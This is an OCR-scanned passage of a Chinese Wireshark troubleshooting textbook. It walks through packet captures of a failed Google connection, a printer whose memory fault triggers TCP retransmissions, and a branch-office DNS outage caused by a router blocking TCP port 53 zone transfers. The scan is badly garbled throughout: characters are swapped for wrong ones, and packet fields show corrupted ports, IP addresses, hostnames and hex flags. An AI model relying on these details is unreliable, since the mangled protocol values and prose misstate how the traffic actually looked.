个 路 由 从 将 网 络 连接 到 Internet。 





1. 侦 听 线路 


为 了 解决 这 个 问题 ， 我 们 首先 访问 Google 以 生成 流量 。 这 是 一 个 全 
网 问题 一 一 意味 痢 它 也 影响 你 的 计算 机 ， 而 且 可 能 是 感染 恶意 软件 导致 
的 所 以 你 不 应 诅 直 接 在 你 的 设备 上 别 探 。 当 你 在 现实 中 遇 到 类 似 这 
样 的 问题 时 ， 网 络 分 流 旨 就 是 较 好 的 解决 方 宁 ， 因 为 它 允 许 你 在 短暂 中 
汤 服 务 后 完全 人 被 动 地 获取 流量 。 通 过 网 络 分 流 右 获得 的 流量 被 你 存在 
nowebaccess3.pcap 文 件 中 。 





这 个 数据 包 的 捕获 以 DNS 流量 开始 ， 而 不 是 我 们 之 前 看 到 的 ARP 流 
量 。 因 为 捕获 的 第 一 个 数据 包 发 往 一 个 外 部 地 址 ， 并 且 数 据 包 2 包 含 来 
目 那 个 地 址 的 啊 应 ， 所 以 我 们 可 以 假设 ARP 过 程 已 经 完成 了 ， 并 日 网 关 
路 由 器 的 MAC-IP 地 址 映射 已 经 存在 于 主机 的 ARP 组 存 中 。 


如 图 10-21 所 示 ， 捕 获 中 的 第 一 个 数据 包 从 主机 172.16.0.8 发 往 地 址 
4.2.2.1@， 并 且 它 是 一 个 DNS 数 据 包 信 。 介 看 该 数据 包 的 内 容 ， 我 们 友 
现 这 是 一 个 查询 Google 的 A 记录 请 求人 @。 


| Wireshark . Packet 1 . nowebaccess3 





> Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) 
>» Ethernet II, Src: HewlettP bf:91:ee (00:25:b3:bf:91:ee)}, Dst: CiscoInc 31:97:33 (00:26:0b:31:07:33) 
>》 Internet Protocol Version 4, Src: 172.16.8.8, Dst: 4.2.2.1 人 0 
> User Datagram Protocol, Src Port: 64417 (64417), Dst Port: 53 (533) 
Y Domain Name System (query) 和 
[Response In: 2] 
Transaction ID: 8x6138 
> Flags: Gx8188 Standard query 
Questions: 1 
AnsWer RRs: © 
Authority RRs: 9 
Additional RRs: 他 
Queries 
Y www.Boogle.com: type A, class IN 
Name: www.Egoogle.cCom 
[Name Length: 14] 
[Label Count: 3] 
Type: A (Host Address) (1) 
Class: IN (6x8681) 








No,: 1 " Timer 0D.000000 * Source: 172.16.0.8 * Destination: 4.2.2.1 * Protocol: DINS ‘ Length: 74 " Inior Standard query’ N138 A WWW.GO00E.COT 





图 10-21 ”查询 Google 的 A 记录 


如 图 10-22 所 示 ， 来 自 4.2.2.1 的 啊 应 是 捕获 文件 的 第 2 个 数据 包 。 查 
看 Packet Details 面 板 ， 我 们 发 现 这 个 请 求 的 域名 服务 右 提 供 了 多 个 
器 答 @。 此 时 看 起 来 通信 一 切 正常 


| Wireshark . Packet 2. nowebaccess3 


> Frame 2: 198 bytes on wire (1528 bits), 198 bytes captured (1528 bits) 
》 Ethernet II, Src: CiscoInc 31:07:33 (68:26:6b:31:67:33), Dst: HewlettP bf:91:ee (80:25:b3:bf:91:ee) 
》 Internet Protocol Version 4, Src: 4.2.2.1, Dst: 172.16.9.8: 
> User Datagram Protocol]l, Src Port: 53 (53), Dst Port: 64417 (64417) 
YY Domain Name System (response) 
Reguest Tn: 1] 
[Time: 8.818448886 seconds] 
Transaction ID: 8x6138 
> Flags: 8x8188 Standard query response, No error 
Questions: 1 
Answer RRs: 7 
Authority RRs; 8 
Additional RRs: 9 
>》 OQueries 
v Answers OQ 
> www .BEBOOE1Le .com: type CNAME, class IN, cname www.1.google.com 
> www.]1.google. : type A, class IN, addr 74.125.95.185 
Www.1.google. : type A, class IN, addr 74.125.95 .196 
> www.l1.google. : type A;, class IN, addr 74.125.95.147 
> www.l1.google. : type A, class IN, addr 74.125.95.99 
WW A, class IN, addr 74.125.95.183 
A, class IN, addr 74.125.95 .194 


.1.google. : type 





> www.l1.google. : type 





No.: 2 * Time: OOIOSS0 " Sourre: 4.2.2.1 ' Destination: 172,16.0.8 " Protocolr DNS .5.105 A 78. 125.95.,106 A 74 125,95,147 A ?74125.95.99 A P4125.95.103 A 74. 125.95.1 





图 10-22 ”包含 多 个 A 记录 的 DNS 啊 应 


现在 用 户 的 计算 机 已 经 得 到 Web 服 务 絮 的 IP 地 址 ， 它 可 以 尝试 与 服 
务 器 通信 了。 如 图 10-23 所 示 ， 通 信 过 程 从 数据 包 3 开 始 ， 这 是 一 个 从 
172.16.0.8 发 往 74.125.95.105 的 TCP 数 据 包 @。 这 个 日 标 地 址 来 目 数 据 包 
2 中 DNS 查 询 响 应 提供 的 第 1 个 A 记录 。TCP 数 据 包 设置 了 SYN 标 志 @， 
并 和 演 试 连接 远程 服务 器 的 80 端 口 个 . 


顾 Wireshark ,Packet 3 , nowebaccess3 





Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
Ethernet II, Src: HewlettP bf:91:ee (88:25:b3:bf:91:ee), Dst: CiscoInc 31:67:33 (69:26:0b:31:97:33) 
Internet Protocol Version 4, Src: 172.16.0.8, Dst: 74.125.95.165 QO 

v Transmission Control Protocol, Src Port: 1251 (1251), Dst Port: 89 (88), Seq: 8, Len:; 9 


[TCP Segment 
ce number: 


[Calculated window size: 8192] 
sum: @x8@afc [validation disabled] 





ters 仿 
Options: (12 bytes), Maximum segment size, No-Operation (NOP), Window scale, No-Operation (NOP), No-Operation (NOP), SACK permitted 





No,: 了- Time; .014921 * Sowurre; 172,16.0.8 * Destination: 74, 125,.95, 105 * Protocol: TCP - Length: 56 有: 1251 — 8015SYN] Seq=0 Win=8192 Len=0 M55=1460 W5=4 SACK PERM=1 





图 10-23 ”尝试 连接 80 端 口 的 SYN 数 据 包 


因为 这 是 一 个 TCP 握 手 过 程 ， 所 以 我 们 知道 应 该 在 啊 应 中 看 到 TCP 
SYN/ACK 数 据 包 ， 但 是 主机 过 一 会 儿 叉 发 这 了 男 一 个 SYN 数 据 包 到 日 
标 。 这 个 过 程 大 概 在 1s 后 再 次 发 生 ， 如 图 10-24 所 示 ， 到 这 里 通信 停止 
了 ， 浏 览 右 报告 找 不 到 网 站 。 





图 10-24 TCP SYN 数 据 包 尝 试 了 3 次 都 没有 收 到 啊 应 


这 时 ， 我 们 想到 由 于 能 成 功 回 外 部 DNS 服 务 如 提交 俘 询 请 求 ， 因 此 
网 络 内 的 工作 站 可 以 连接 到 外 网 。DNS 服 务 器 响应 了 一 些 看 起 来 有 效 的 
地 址 ， 然 后 我 们 的 主机 束 笃 试 同 其 中 一 个 地 址 建立 连接 。 和 而且， 我 们 答 
试 连 接 的 本 地 工作 站 看 起 来 功能 正 钊 。 


问题 是 远程 服务 器 没有 啊 应 我 们 的 连接 请 求 ， 连 TCP RST 数 据 包 都 
没 发 过 来 。 可 能 的 原因 有 几 种 : Web 服务 器 配置 错误 、Web 服 务 器 的 协 
议 栈 朋 尝 、 远 程 网 络 部 署 了 数据 包 过 滤 设 备 叫 。 假 设 本 地 网 络 没 有 数据 
包 过 滤 设 备 ， 那 么 所 有 可 能 的 解决 方法 都 在 远程 网 络 上 ， 这 超出 了 我 们 
的 控制 冰 围 。 在 这 个 案例 中 ，Web 服 务 器 不 能 正 昌 工作， 我 们 的 所 有 壬 
试 都 失败 了 。 一 旦 Google 修 复 故 障 ! 半 ， 通 信 就 可 以 继续 了 。 


3. 学 到 的 知识 


这 个 场景 中 的 问题 不 是 我 们 能 修复 的 。 我 们 的 分 析 表 明 ， 问 题 不 在 
于 我 们 网 络 上 的 主机 、 路 由 秦 ， 也 不 在 于 提供 域名 解析 服务 的 外 部 DNS 


服务 右 。 问 题 在 我 们 的 网 络 设 施 之 外 。 


有 时 候 肥 现 这 不 是 我 们 的 问题 不 仅 能 绥 解 压力 ， 也 能 在 官 理 层 来 歼 
站 时 挽回 闫 面 。 我 与 很 多 运营 两、 设备 厂商 和 软件 公司 打 过 区 过， 他 们 
都 说 不 是 自己 那 边 的 问题 ， 但 你 已 经 看 到 ， 数 据 包 是 不 会 说 诉 的 。 


10.4 打印 机 故障 


我 们 的 技术 支持 官 理 员 过 到 了 一 个 打印 机 的 难题 。 销 售 部 门 的 用 户 
报 各 说 大 批量 的 打印 机 出 故障 了 。 妆 用 户 友 送 大 量 打 印 作 业 给 它 时 ， 它 
会 打印 几 页 然后 集 止 工作 。 他 们 改动 了 很 多 驱动 配 首 选项， 但 没有 任何 
效 束 。 技 术 文 持 的 员工 们 硕 望 你 去 确认 这 不 是 网 络 问题 。 


10.4.1 侦 听 线路 


这 个 问题 的 焦点 在 于 打印 机 ， 因 此 我 们 希望 尽 可 能 将 咒 探 右 放 到 离 
打印 机 了 最 近 的 地 方 。 虽 然 我 们 不 能 在 打印 机 上 安 痛 Wireshark， 但 网 络 上 
使 用 了 融 级 三 层 交 换 机 ， 所 以 我 们 可 以 使 用 病 口 镜像 功能 。 我 们 将 打印 
机 和 连接 的 响 口 镜像 到 一 个 空 症 口 ， 然 后 将 一 台 狠 有 Wireshark 的 笔记 本 电 
脑 连 接 到 该 病 口 。 安 并 完 成 后 ， 我 们 让 一 位 用 户 友 送 大 量 打 纯 作 业 给 打 
纯 机 ， 而 我 们 会 监视 响 口 输出 内 容 ， 最 后 得 到 捕获 记录 文件 


inconsistent_printer.pcap。 


10.4.2 ”分析 


如 图 10-25 所 示 ， 捕 获 文 件 的 开头 是 发 送 打 印 作 业 的 主机 
(172.16.0.8) 与 打印 机 (172.16.0.253) 的 TCP 握 手 。 握 手 之 后 ， 一 个 
大 小 为 1460 字 节 的 TCP 数 据 包 发 送 到 打印 机 @。 数 据 大 小 既 可 以 在 
Packet List 面 析 IPmfo 列 的 右边 看 到 ， 也 可 以 在 Packet Details 面 板 的 TCP 头 
部 信息 的 底部 看 到 。 


顾 Wireshark . Packet 4， inconsistent_printer 





> Frame 4: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits) 
> Ethernet II, Src: HewlettPp bf:91:ee (88:25:b3:bf:91:ee), Dst: HewlettP 77:bd:ba (88:23:7d:77:bd:ba) 
> Internet Protocol Version 4, Src: 172.16.8.8, Dst: 172.16.9.253 
Y Transmission Control Protocol, Src Port: 3527 (3527), Dst Port: 9166 (9166), Seq: 1, Ack: 1, Len: 1466 

Source Port: 3527 

Destination Port: 9180 

[Stream index: 8] 

[TCP Segment Len: 1469] 

Sequence number: 1 (relative sequence number) 

[Next sequence number: 1461 (relative sequence number)] 

Acknowledgment number: 1 (relative ack number) 

Header Length: 28 bytes 

Flags: 8x818 (ACK) 

Window size value: 16425 

[Calculated window size: 6576868] 

[Window size scaling factor: 4] 

Checksum: @x5ef4 [validation disabled] 

Urgent pointer: 作 

> [SEQ/ACK analysis] 

Y Data (1469 bytes)@O 

Data: lb252d31323334355840594a4c29534554205245543d4f4e 。。。 

[Length: 14668] 





NO, # * Time: 0.001637 " Souree: 172,16.0.8 * Destination: 172,16.0.253 * Protocok: TCP " Length’ 1514 " Info: 3527 —» 91O00 (ACK) Seq=I1 Ack=I Win=65700 len=1460 


ss 而 








图 10-25 ”通过 TCP 传 输 到 打印 机 的 数据 


数据 包 4 后 面 是 另 一 个 包含 1460 字 节 的 数据 包 @， 如 图 10-26 所 示 。 
这 个 数据 被 打印 机 人 确认 了 了。 


Source inati Protocol Lengath Info 


3 8.888201 
4 8.881637 
5 0.801646 
2 6 09-985493 
7 9.885561 
8 8-.885571 
9 8.885578 
19 0.885585 
11 8.833569 
12 8.833626 
13 8.833640 
14 8.833649 
15 8.833658 
16 8.898314 


172.16.8. 
172.16.8. 
172.16.0. 
172.16.08. 
172.16.0. 
172.16.8. 
L710 
172.16.8. 
172.16.08. 
172.16.08. 
EE 
172.16.8. 
172.16.8. 
172.16.0.8 


9188 [ACK] Seq=1 AcK=1 Win=65788 Len=8 

9188 [ACK] seq=1 Ack=1 Win=65788 Len=1469 

9109 [ACK] Seq=1461 Ack=1 Win=65788 Len=1469 L 
3527 [PSH, ACK] Seq=1 Ack=2921 Win=7888 Len=186 
9168 [ACK] Seq=2921 Ack=187 Win=65592 Len=1460 
91098 [ACK] Seq=4381 Ack=197 Win=65592 Len=14690 
91868 [ACK] Seq=5841 Ack=187 Win=65592 Len=1460 
9109 [ACK] Seq=7381 Ack=197 Win=65592 Len=1460 
3527 [ACK] Seq=187 Ack=8761 Win=6144 Len=8 

9188 [ACK] Seq=8761 Ack=197 Win=65592 Len=1469 
91868 [ACK] Seq=18221 Ack=187 Win=65592 Len=1468 
9188 [ACK] Seq=11681 Ack=187 Win=65592 Len=1468 
9188 [ACK] Seq=13141 Ack=187 Win=65592 Len=1468 
3527 [ACK] Seq=187 Ack=1468] Win=4488 Len=8 





sseooooooooaesasa 


[| 


图 10-26 ”正常 的 数据 传输 和 TCP 人 确认 


在 捕获 文件 的 最 后 两 个 数据 包 之 前 ， 数 据 流 一 直 正 和 常 。 数 据 包 121 
是 一 个 TCP 音 传 数据 包 ， 也 是 故障 的 第 一 个 标志 ， 如 图 10-27 所 示 。 


当 一 个 设备 发 送 TCP 数 据 包 给 远程 设备 ， 而 远程 设备 没有 确认 此 次 
传输 时 ， 人 一 旦 到 达 重 传 门限 ， 发 送 设备 就 
假设 远程 设备 没有 收 到 数据 ， 从 而 立刻 重 传 数据 包 。 在 通信 停止 之 前 ， 
这 个 过 程 重 复 了 多 次 。 


帮 Wireshark .Packet 121. inconsistent_printer 





Frame 121: 1146 bytes on Wire (9168 bits), 1146 bytes captured (9168 bits) 
Ethernet II, Src: HewlettP bf:91:ee (88:25:b3:bf:91:ee), Dst: Hewlettp 77:bd:ba (68:23:7d:77:bd:ba) 
Internet Protocol Version 4, Src: 172.16.9-8，Dst: 172.16.0.253 
Y Transmission Control Protocol, Src Port: 3527 (3527), Dst Port: 9188 (9188), Seq: 118261, Ack: 197，Len: 1892 


Flags: 80x818 (ACK) 
Window size value: 
ed window size 

WwW size scaling factor: 4] 

sum; @x5d84 [validation disabled] 
Urgent pointer: 
[SEQ/ACK analysis] @ 

[iRTT: 8.,888281888 secon ds] 


alysis Flags] 
[Expert Info (Note/Sequence): This frame is a (suspected) retransmission] 
[The RTO for this segment was: 5.592585068 secon ds]@ 
RTO_ based delta 二 frame: 12 


0 based on dejta 1rom frame: 
[Expert Info (Warn/Sequence): TCP window specified by the receiver is now completely ful]l] 
Retransmitted TCP segment data (1992 bytes) 











? 172,16,0.8 " Destination: 172,16,0.253 " Protoeok: TCP CP Window Fil {TCP Retransmission) 3527 — 9100 [ACH) Seq=118261 Ack=I107 Win=65592 1 





图 10-27 ”这 些 TCP 重 传 数 据 包 是 故障 的 一 个 标志 


在 这 个 场景 中 ， 因 为 打印 机 没有 确认 传输 的 数据 ， 所 以 客户 工作 站 
驶 回 打 印 机 发 送 重 传 数 据 包 。 如 果 展 开 TCP 头 部 的 SEQ/ACK analysis 部 
分 以 及 下 方 的 额外 信息 ， 如 图 10-27 所 示例 ， 你 束 可 以 从 细节 中 看 到 为 
什么 这 是 重 传 。 根 据 Wireshark 加 工 的 细 贡 ， 数 据 包 121 是 数据 包 120 的 重 
传人 @。 男 外 ， 草 传 数据 包 的 重 传 超时 (RTO) 在 5.5s 依 左 右 。 


当 分 析 数 据 包 间隔 时 间 时 ， 你 可 以 更 改 时 间 显 示 格 式 以 适应 特定 情 
形 。 在 这 个 案例 中 ， 我 们 想 看 一 看 之 前 的 数据 包 在 发 送 多 久 后 发 生 了 草 
传 ， 于 是 选择 View->Time Display Format 并 改 成 Seconds Since Previous 
Captured Packet 这 个 选项 。 然 后 ， 如 图 10-28 所 示 ， 你 可 以 清楚 地 看 见 初 
始 数 据 包 (数据 包 120〉 发送 5.5s 后 发 生 了 数据 包 121 的 重 传 @， 


No. Tine OO Source Desiination Protocol Length Info 
121 5.592585 172.16.9.8 172.16.8.253 TCP 1146 [TCP Window Ful1] [TCP Retransmission] 3527 ?> 9188 [ACK] Seq=118261 Ack=187 Win=,. 





122 5.6D0089 i yp 172.16.©@.253 TCP 1146 [TCP Window Full] [TCP Retransmission] 3527 3 9109 [ACK] Seq=118261 Ack=197 Win=... 





图 10-28 ”查看 数据 包间 隔 时 | 间 有 利于 解决 问题 


下 一 个 数据 包 是 数据 包 120 的 另 一 个 重 传 。 这 个 数据 包 的 RIO 是 
11.10s， 包 括 上 一 个 数据 包 的 5.5s RTO。Packet List 面 板 的 Time 列 告诉 我 
们 ， 在 上 一 次 重 传 5.6s 后 发 生 了 这 次 重 传 。 这 好 像 是 捕获 文件 中 的 最 后 
一 个 数据 包 ， 巧 合 的 是 ， 打 印 机 大 概 在 这 个 时 间 俘 止 打印 了 。 


好 在 这 个 分 析 场 景 只 涉及 内 网 的 两 合 设备 ， 所 以 我 们 只 需要 确定 是 


客户 工作 站 还 是 打印 机 的 问题 。 我 们 可 以 看 见 数据 正 第 流动 了 相当 长 的 
时 间 ， 然 而 在 对 一 时 刻 ， 打 印 机 集 止 啊 应 工作 站 了。 工作 站 尽 了 最 大 努 
力 投 化 数据 包 ， 单 传 束 是 一 个 明证 ， 但 打印 机 束 是 没有 啊 应 。 这 个 问题 
可 以 在 其 他 工作 站 上 重 现 ， 所 以 我 们 猜测 打印 机 才 是 问题 的 来 源 。 


进一步 分 析 后 ， 我 们 用 现 打印 机 的 内 存 出 故障 了 。 当 大 量 打印 作业 
及 达到 打印 机 时 ， 它 只 打印 一 定 的 页 数 ， 一 旦 访问 到 特定 内 存 区 域 束 停 
a 内 存 问 题 导致 打印 机 无 法 接收 新 数据 ， 并 中 断 了 与 
主机 的 通信 。 


10.4.3 ”学 到 的 知识 


虽然 这 个 打印 机 问题 不 是 网 络 所 致 ， 但 我 们 仍 可 以 用 Wireshark 指 出 
它 。 中 之 前 的 场景 不 同 ， 这 里 只 有 TCP 流 量 。 幸 好 ， 当 两 台 设 备 停止 通 
信 时 ，TCP 给 我 们 留 下 了 有 用 的 信息 。 


在 这 个 案例 中 ， 当 通信 和 意外 停止 时 ， 我 们 靠 TCP 内 置 的 重 传 功 能 指 
出 了 问题 的 确切 位 置 。 继 续 学 习 下 面 的 场景 时 ， 我 们 会 经 第 依赖 于 这 样 
的 功能 来 解决 更 复杂 的 问题 。 


10.5 分 公司 之 困 


在 这 个 场景 中 ， 一 家 公司 在 总 部 之 外 新 开设 了 几 和 家 分 公司 。 通 过 部 
昔 一 全 Windows 域 控制 如 服务 偶 和 一 台 备 用 域 控 制 融 ， 公 司 的 所 有 开设 
施 几 乎 都 放置 在 总 部 。 域 控制 春 负 责 处 理 DNS 和 分 公司 用 尸 的 认证 请 


域 控制 兹 是 一 个 代理 DNS 服 务 占 ， 它 接收 来 自 忌 部 的 上 游 DNS 服 务 
价 的 资源 记录 信息 。 


当 部 首 团 队 将 新 设施 延伸 到 分 公司 时 ， 友 现 没 有 人 能 访问 网 络 上 的 
内 部 Web 应 用 服务 器 。 这 些 服 务 器 位 于 总 部 办 公 室 ， 通 过 广域网 (Wide 
Area Network，WAN) 访问 。 问 题 影 响 到 分 公司 的 所 有 有 用户， 并 只 限于 
这 些 内 部 服务 器 。 所 有 用 户 都 可 以 访问 Internet 以 及 分 公司 内 的 其 他 资 


图 10-29 显 示 了 在 这 个 场景 中 要 考虑 的 组 件 ， 包 括 了 多 个 站 点 。 


| 


den | | .im 
工作 站 总 部 应 用 服务 器 
laa ls oly 172: 1 06.10200 


: 


分 公司 从 属 DN5S 服 务 器 总 部 主 DN3 服 务 顺 
W210.16.231 ly al0. 6250 





图 10-29 ”分 公司 之 困 问 题 的 相关 组 件 


10.5.1 侦 听 线路 


由 于 问题 出 在 总 部 和 分 公司 间 的 通信 过 程 中 ， 因 此 我 们 可 以 在 多 个 
地 点 收集 数据 来 跟踪 问题 。 问 题 可 能 出 在 分 公司 的 客户 关上 ， 所 以 我 们 
使 用 问 口 镜像 功能 奏 看 其 中 一 人 台 计 算 机 在 线路 上 看 到 了 什么 数据 包 。 收 
集 完 这 个 信息 后 ， 我 们 可 以 使 用 它 推 测 出 其 他 收集 地 点 以 帮助 解决 问 
古 。 从 其 中 一 个 和 铬 户 帝 捕获 的 初始 数据 包 保 存在 stranded_clientside.pcap 


Nts 


10.5.2 ”分析 


如 图 10-30 所 示 ， 当 工作 站 172.16.16.101 堂 试 访问 托管 在 总 部 应 用 服 
务 器 172.16.16.200 的 应 用 程序 时 ， 产 生 了 捕获 文件 的 第 1 个 数据 包 。 这 
个 捕获 只 有 两 个 数据 包 。 第 1 个 数据 包 是 友 送 到 172.16.16.251@ 的 DNS 


请 求 ， 查 询 应 用 服务 器 @ 的 A 记录 @。 这 是 总 部 172.16.16.200 服 务 器 的 


DNS 域名 。 

如 图 10-31 所 示 ， 这 个 数据 包 的 啊 应 是 服务 器 故障 @， 表 明 DNS 查 
询 被 阻止 了 。 注 意 到 这 个 数据 包 只 是 一 个 错误 (服务 器 故障 ) ， 并 没有 
啊 应 查询 结果 人 @。 


现在 我 们 知道 该 通信 故障 与 DNS 有 关 。 因 为 分 公司 的 DNS 查询 由 
DNS 服务 器 172.16.16.251 解 析 ， 我 们 前 往 下 一 站 。 


为 了 从 分 公司 的 DNS 服务 如 捕获 合 运 的 流星 ， 我 们 将 嘿 探 厚 留 在 原 
地 ， 只 改变 病 口 镜像 设置 。 现 在 服务 器 的 流量 驶 被 镜像 到 我 们 的 别 探 需 
了 。 捕 获 结果 在 stranded_branchdns.pcap 文 件 中 。 


| Wireshark . Packet 1 . stranded clientside 





» Frame 1: 69 bytes on wire (552 bits), 69 bytes captured (552 bits) 
> Ethernet II, Src: IntelCor Sb:7d:4a (86:21:6a:5b:7d:4a), Dst: IntelCor 5b:7d:4a (8@8:21:6a:5b:7d:4a) 
> Internet Protocol Version 4, Src: 172.16.16.181, Dst: 172.16.15.251@ 
》 User Datagram Protocol, Src Port: 56779 (56779), Dst Port: 53 (53) 
Y Domain Name System (duery) 
Response In: 2 
Transa ction ID: 8x8883 
> Flags: Ox8188 Standard query 
Questions: 1 
Answer RRs: @ 
Authority RRs: © 
Additional RRs: 8 
Y Queries 
Y appserver: type A, class IN 
Name: appserver @ 
[Name Length: 9] 
[Label Count: 1] 
Type: A (Host Address) (1) 人 © 
Class: IN (8x8881) 





Neo.: 1 * Time: 0.000000 ' Source: 172.16,16.101 " Destination’ i172,16,16.251 * Protwcolr DNS " Length: 69 " Inio: Standard que COO0? A appserver 





图 10-30 ”通信 从 查询 应 用 服务 右 A 记 录 的 DNS 请 求 开 始 


| Wireshark . Packet 2 ,stranded clientside 





> Frame 2: 69 bytes on wire (552 bits), 69 bytes captured (552 bits) 
> Ethernet II, Src: IntelCor 5b:7d:4a (66:21:6a:5b:7d:4a), Dst: IntelCor 5b:7d:4a (86:21:6a:5b:7d:4a) 
> Internet Protocol] Version 4, Src: 172.16.16.251, Dst: 172.16.16.191 
> User Datagram Protocol, Src Port: 53 (53), Dst Port: 56779 (56779) 
Domain Name System (response) 
[Request In: 1] 
[Time: 8.888346888 seconds] 
Transaction ID: 8x8883 
》 Flags: Gx8182 Standard query response, Server failure ©@ 
Questions: 1 
Answer RRs: 8 和 
Authority RRs: 名 
Additional RRs: 9 
Y Queries 
Y appserver: type A, class IN 
Name: appserver 





[Name Length: 9] 

[Label Count: 1] 

Type: A (Host Address) (1) 
Class: IN (8x8881) 


No 2 * Time: O.000346 * Souree: 172,16.16.251 ' Destination: 172,16.16.101 Prpipcof DNS " tengeh: 59 * Infor Srandsre query resporse (NOOO? Server Sire A sppserver 





图 10-31 ” 俘 询 啊 应 表明 这 是 上 游 的 问题 


如 图 10-32 所 示 ， 这 个 捕获 的 开头 是 我 们 之 前 看 到 的 查询 和 啊 应 ， 
但 还 有 一 个 额外 的 数据 包 。 额 外 的 数据 包 看 起 来 很 奇怪 ， 因 为 它 尝 试 与 
中 心 办 公 室 的 首选 DNS 服务 器 (172.16.16.250)〉@@ 的 标准 DNS 服 务 端 口 


53 份 进行 通信 ， 但 它 却 不 是 我 们 过 去 看 见 的 UDP 类 型 仿 . 


曾 Wireshark .Packet 3 ,stranded_ branchdns 一 口 xX 








ame 3; 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 

Ethernet II, Src: Vmware_ 39:42: (80:0c:29:39:42:78), Dst: Vmware_ 3d:168:f5 (96:9c:29:3d:19:f5) 
Internet Protocol Version 4, Src: 172.16.16.251, Dst: 172.16.16.259 种 
9 


@ Transmission Control Protocol, Src Port 66), Dst Port: 53 (53), Seq: 68, Len: 0 
: 491608 




















图 10-32 ”这 个 SYN 数 据 包 使 用 了 53 端 口 ， 但 不 是 UDP 


为 了 找 出 这 个 数据 包 的 用 途 ， 回 顾 我 们 在 第 7 章 对 DNS 的 讨论 。 
DNS 通 常 使 用 UDP， 但 当 啊 应 超过 一 定 大 小 时 要 使 用 TCP。 在 那 种 情况 
下 ， 我 们 会 看 见 一 些 触发 TCP 流 量 的 UDP 流 量 。 男 外 ，TCP 也 用 于 DNS 
eS 它 使 资源 记录 在 DNS 服 务 器 之 间 传 输 ， 这 里 就 是 该 种 


分 公司 的 DNS 服 务 器 是 总 部 DNS 服 务 器 的 从 属 服 务 器 ， 意 味 着 分 公 
司 的 DNS 服 务 器 依赖 于 从 总 部 服务 器 获得 资源 记录 。 分 公司 用 户 试 图 访 
问 的 应 用 服务 器 放置 在 总 部 ， 意 味 着 总 部 DNS 服 务 右 是 它 的 权威 DNS 服 
务 器 。 要 使 分 公司 服务 器 能 解析 用 户 对 应 用 服务 器 的 DNS 请 求 ， 总 部 
DNS 服务 右 必 须 把 DNS 资源 记录 传输 给 分 公司 DNS 服务 硕 ， 这 可 能 是 捕 
获 文 件 中 SYN 数 据 包 的 来 源 。 


SYN 数 据 包 没 有 得 到 啊 应 ， 这 告诉 我 们 总 部 和 分 公司 DNS 服务 器 之 
间 和 失败 的 区 域 传 送 导 致 了 DNS 故障 。 现 在 我 们 可 以 进一步 找 出 区 域 传送 
失败 的 原因 。 办 公 室 之 间 的 路 由 器 或 中 心 办 公 室 的 DNS 服 务 器 可 能 是 罪 
揣 视 首 。 为 了 找 出 问题 ， 我 们 可 以 咒 探 中 心 办 公 室 DNS 服 务 硕 的 流量 ， 
查看 SYN 数 据 包 是 不 是 到 达 了 服务 器 。 


我 没有 给 出 中 心 办 公 室 DNS 服 务 器 的 流量 捕获 文件 ， 因 为 根本 就 没 
有 。SYN 数 据 包 从 来 没有 到 达 服 务 器 。 派 遗 技术 人 员 查 看 连接 两 个 办 公 
室 的 路 由 需 配 置 后 ， 我 们 发 现 中 心 办 公 室 的 路 由 器 被 配置 成 只 允许 53 端 
口 的 UDP 流量 进入 ， 而 53 端 口 的 TCP 流 量 则 被 阻止 了 。 这 个 简单 的 配置 
错误 阻止 了 服务 喜 间 的 区 域 传 送 ， 从 而 导致 分 文 办 公 室 的 客户 端 无 法 解 
析 对 中 心 办 公 室 设备 的 查询 。 


10.5.3 ”学 到 的 知识 


看 完 这 个 “犯罪 剧 ”， 你 一 定 学 到 了 很 多 关于 调 俘 网 络 通 信和 问题 的 知 
识 。 当 “犯罪 ”有 友 生 后 ， 贷 探 开始 问讯 受害 者 。 找 到 线索 ， 顺 滕 近 瓜 ， 和 下 
色 找 到 菲 魁 栅 站 。 


在 这 个 场景 中 ， 我 们 一 开始 先 查看 了 受害 者 〈 工 作 站 ) ， 然 后 找到 
了 DNS 通信 问题 这 个 线索 。 这 个 线索 将 我 们 带 到 分 支 DNS 服务 器 ， 然 后 
又 到 中 心 DNS 服 务 器 ， 最 终 找到 路 由 器 ， 也 就 是 问题 的 来 源 。 


在 分 析 时 ， 请 符 试 从 数据 包 中 找 出 线 宗 。 线 系 不 一 定 能 告诉 你 谁 
是 “罪犯 ?， 但 退 第 它们 最 终 能 帮 你 找 出 来 。 


10.6 ”后 气 的 开 友 者 


在 代 界 ， 开 友 痢 和 系统 官 理 员 经 常 争吵 。 开 发 者 总 是 将 程序 故障 归 
答 于 粳 糙 的 网 络 说 置 和 设备 。 系 统管 理 员 则 倾 问 于 把 网 络 错误 和 网 络 绥 
侵 归 知 于 糖 糙 的 代码 。 


在 这 个 场景 中 ， 程 序 员 开 有 友 了 一 个 应 用 程序 ， 用 于 跟踪 多 个 商店 的 
销售 并 将 报告 发 回 中 心 数 据 库 。 为 了 币 约 正 弟 工作 时 间 的 市 宽 ， 它 没有 
航 设 计 成 实时 应 用 程序 。 而 是 等 报告 数据 蒜 积 一 天 后 ， 才 在 晚上 以 逐 号 
分 隔 值 (comma-separated value，CSV) 文件 的 形式 传 回 ， 插 入 中 心 数 
据 库 中 。 


然而 ， 这 个 新 开 妈 的 应 用 程序 工作 情况 不 太 正 党 。 服 务 硕 接收 到 了 
各 个 了 商店 传 回 的 文件 ， 但 插入 数据 库 的 数据 是 错误 的 。 一 些 地 区 的 数据 
于 和 失 了 ， 有 的 数据 还 存在 错误 ， 而 且 文 件 的 茶 些 部 分 还 丢失 了 。 系 统管 
理 员 很 烦恼 ， 因 为 程序 员 抱 忽 这 和 古 网 络 的 问题 。 程 序 员 一 口 晓 定 文 件 在 
从 商店 传 到 中 心 数 据 库 时 彼 损 二 了。 我 们 束 要 证 明 他 是 错 的 。 


10.6.1 侦 听 线路 


为 了 收集 所 需 数 据 ， 我 们 可 以 在 其 中 一 个 两 店 或 中 心 办 公 室 捕获 数 
据 包 。 故 隐 影 咱 到 了 所 有 了 商店， 因此 如 条 这 确实 是 网 络 寻 致 的 问题 ， 那 
肯定 是 在 中 心 办 公 室 那 边 一 一 它 是 所 有 商店 通信 的 汇聚 点 。 


为 网 络 区 换 机 支 持 闹 口 锐 像 ， 所 以 我 们 用 新 口 锐 保 功能 咒 探 服务 
俐 的 流量 。 我 们 只 捕获 单个 商店 上 传 CSV 文 件 到 收集 服务 问 的 流量。 结 
果 保 存在 tickedoffdeveloper.pcap 文 件 中 。 


10.6.2 分 析 


